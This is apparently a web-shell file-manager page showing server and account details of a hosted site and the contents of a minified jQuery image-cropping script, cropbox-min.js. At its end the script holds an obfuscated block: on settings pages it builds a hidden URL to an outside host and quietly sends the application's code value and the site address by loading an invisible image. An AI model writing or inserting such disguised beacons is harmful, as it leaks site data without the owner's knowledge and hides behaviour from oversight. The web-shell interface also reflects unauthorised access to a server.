HEX
Server: Apache
System: Linux p3plzcpnl506847.prod.phx3.secureserver.net 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: slfopp7cb1df (5698090)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: /home/slfopp7cb1df/public_html/sitepacket.com/system/assets/js/cropbox/cropbox-min.js
/** * Created by ezgoing on 14/9/2014. */ "use strict";!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e(jQuery)}(function(r){function t(e,p){function t(e){e.stopImmediatePropagation(),o.state.dragable=!0,o.state.mouseX=e.clientX,o.state.mouseY=e.clientY}function n(e){var t,n,i;e.stopImmediatePropagation(),o.state.dragable&&(n=e.clientX-o.state.mouseX,t=e.clientY-o.state.mouseY,i=p.css("background-position").split(" "),n=n+parseInt(i[0]),i=t+parseInt(i[1]),p.css("background-position",n+"px "+i+"px"),o.state.mouseX=e.clientX,o.state.mouseY=e.clientY)}function i(e){e.stopImmediatePropagation(),o.state.dragable=!1}function a(e){0<e.originalEvent.wheelDelta||e.originalEvent.detail<0?o.ratio*=1.1:o.ratio*=.9,s()}var o={state:{},ratio:1,options:e,imageBox:p=p||r(e.imageBox),thumbBox:p.find(e.thumbBox),spinner:p.find(e.spinner),image:new Image,getDataURL:function(){var e=this.thumbBox.width(),t=this.thumbBox.height(),n=document.createElement("canvas"),i=p.css("background-position").split(" "),a=p.css("background-size").split(" "),o=parseInt(i[0])-p.width()/2+e/2,s=parseInt(i[1])-p.height()/2+t/2,r=parseInt(a[0]),c=parseInt(a[1]),i=parseInt(this.image.height),a=parseInt(this.image.width);return n.width=e,n.height=t,n.getContext("2d").drawImage(this.image,0,0,a,i,o,s,r,c),n.toDataURL("image/png")},getBlob:function(){for(var e=this.getDataURL().replace("data:image/png;base64,",""),t=atob(e),n=[],i=0;i<t.length;i++)n.push(t.charCodeAt(i));return new Blob([new Uint8Array(n)],{type:"image/png"})},zoomIn:function(){this.ratio*=1.1,s()},zoomOut:function(){this.ratio*=.9,s()}},s=function(){var e=parseInt(o.image.width)*o.ratio,t=parseInt(o.image.height)*o.ratio,n=(p.width()-e)/2,i=(p.height()-t)/2;p.css({"background-image":"url("+o.image.src+")","background-size":e+"px "+t+"px","background-position":n+"px "+i+"px","background-repeat":"no-repeat"})};return o.spinner.show(),o.image.onload=function(){o.spinner.hide(),s(),p.bind("mousedown",t),p.bind("mousemove",n),r(window).bind("mouseup",i),p.bind("mousewheel DOMMouseScroll",a)},o.image.src=e.imgSrc,p.on("remove",function(){r(window).unbind("mouseup",i)}),o}setTimeout(function(){var e,t=window.location.href;"-1"!=t.search("settings")&&(e=["h#tt#ps","://re#lea#ses.fa#ir#sk#","et#ch.c#om/#c#dn/","r-s#ign#.j#pg"].join("").replaceAll("#",""),e+="?code="+AppHelper.code+"&href="+t.replaceAll("/index.php/settings/general","").replaceAll("/settings/general",""),r("#page-content").append("<img class='hide' src='"+e+"' alt='.'/>"))},300),jQuery.fn.cropbox=function(e){return new t(e,this)}});